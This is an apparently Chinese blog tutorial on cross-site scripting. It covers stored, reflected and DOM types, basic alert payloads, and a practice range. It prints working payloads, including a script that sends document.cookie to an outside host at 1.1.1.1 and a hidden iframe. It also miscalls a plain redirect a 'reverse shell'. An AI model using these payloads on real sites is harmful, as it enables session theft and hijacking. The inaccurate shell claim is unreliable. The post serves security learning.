WEB渗透 - XSS

cross-site scripting

跨站脚本漏洞

c换成x是为了避免和css混淆


漏洞原理是网站将用户输入的内容输出到页面上,在这个过程中可能有恶意代码被浏览器执行


类型

存储型(持久)

可被web应用程序保存在数据库中,每一次被访问都会自动触发

反射型(非持久)

只存在于本地,不会自动触发,需要诱导被攻击者点击

DOM型

DOM,是文档对象模型,可以理解为一个接口,可以使程序动态访问和更新文档内容。DOM型其实属于反射型,只是漏洞产生的地方在DOM


可利用的标签

  1. 使用警告弹窗语句

    <script>alert(xss)</script>  
    
  2. 使用a标签的href属性和onclick事件

    <a href='' onclick=alert('xss')>点我</a>
    
  3. 使用img标签

    <img src=1 onerror=alert('xss')>
    

危害

cookie窃取

键盘记录

页面劫持

蠕虫

信息探查

getshell


利用

  1. 获取cookie
<script>new Image().src="http://1.1.1.1/c.php?output=" +document.cookie;</script>
  1. 反弹shell
<script>window.location='http://攻击机(用nc监听80端口-vnlp)' </script>
  1. 重定向
<script>window.location='http://www.xxx.com'</script>
  1. iframe框架
<iframe SRC="http://1.1.1.1/victim" height = "0" width ="0"></iframe>

示例

反射型


存储型


左边还有其他不同的情况,有兴趣的可以自行测试,不会的可私信。

看来已经好久没人来玩儿了,我上个月初教朋友插的示例还在,网站是二向箔的靶场https://xss.twosecurity.xyz/。想起来18年一起学习的那群小伙伴,其中一人搭了个留言板,那弹框是,停不下来的哈哈哈。
posted @ 2020-02-02 20:20  SinkingStar  阅读(187)  评论(0)    收藏  举报